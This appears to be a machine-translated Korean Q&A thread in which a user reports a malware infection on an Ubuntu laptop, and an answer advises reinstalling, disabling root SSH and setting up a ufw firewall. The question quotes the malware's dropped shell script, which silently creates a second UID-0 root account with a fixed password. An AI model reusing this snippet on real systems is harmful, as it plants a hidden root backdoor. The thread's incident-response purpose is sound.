랩톱에서 맬웨어를 처리하는 방법은 무엇입니까?

내 Ubuntu 13.10 랩톱이 일종의 맬웨어에 감염되어 있다고 확신합니다.

가끔씩 / lib / sshd (루트 소유) 프로세스가 실행되고 많은 CPU를 소비한다는 것을 알았습니다. / usr / sbin / sshd를 실행하는 것은 sshd 서버가 아닙니다.

바이너리에는 --wxrw-rwt 권한이 있으며 / lib 디렉토리에 스크립트를 생성하고 생성합니다. 최근 이름은 13959730401387633604이며 다음을 수행합니다.

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

gusr 사용자는 맬웨어에 의해 독립적으로 생성 된 다음 100 % CPU를 사용하면서 chpasswd가 정지됩니다.

지금까지 gusr 사용자가 / etc /의 파일에 추가되었다는 것을 확인했습니다.

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

맬웨어가 "-"접미사를 사용하여 이러한 모든 파일의 복사본을 만든 것 같습니다. 루트가 수정 한 / etc / 파일의 전체 목록은 여기에서 볼 수 있습니다 .

또한 / etc / hosts 파일이 this 로 변경되었습니다 .

/ lib / sshd는 /etc/init.d/rc.local 파일의 끝에 자신을 추가하여 시작합니다!

사용자를 제거하고 파일을 제거하고 처리 된 트리를 종료하고 암호를 변경하고 ssh 공개 키를 제거했습니다.

나는 기본적으로 망했다는 것을 알고 있으며 전체 시스템을 다시 설치할 것입니다. 그럼에도 불구하고 다른 여러 컴퓨터에 로그인했기 때문에 최소한 제거하고 시도하는 방법을 알아내는 것이 좋습니다. 이 문제를 해결하는 방법에 대한 제안은 감사하겠습니다.

3 월 25 일에 루트 로그인을 강제로 수행 한 것으로 보입니다. 우분투에서 루트 ssh가 기본적으로 활성화되어 있다는 것을 몰랐습니다. 나는 그것을 비활성화하고 거부 호스트를 세웠다.

로그인은 홍콩 어딘가에 59.188.247.236에서 시작되었습니다.

나는 EmperorLinux에서 랩톱을 얻었고 루트 액세스를 가능하게했습니다. 그중 하나가 있고 sshd를 실행중인 경우주의하십시오.

먼저 그 기계를 네트워크에서 분리하십시오!

둘째, 왜 루트 계정을 활성화 했습니까? 그럴만한 이유가 없다면 루트 계정을 활성화하지 마십시오.

셋째, 예, 확실하게 확인하는 유일한 방법은 새로 설치하는 것입니다. 또한 모든 것이 언제 시작되었는지 확신 할 수 없으므로 새로 시작하고 백업으로 돌아 가지 않는 것이 좋습니다.

또한 다음 설치에서 방화벽을 설정하고 들어오는 모든 연결을 거부하는 것이 좋습니다.

sudo ufw default deny incoming

ssh를 다음과 같이 허용하십시오.

sudo ufw allow ssh

루트 계정을 활성화하지 마십시오! 물론 루트 SSH 로그인이 비활성화되어 있는지 확인하십시오.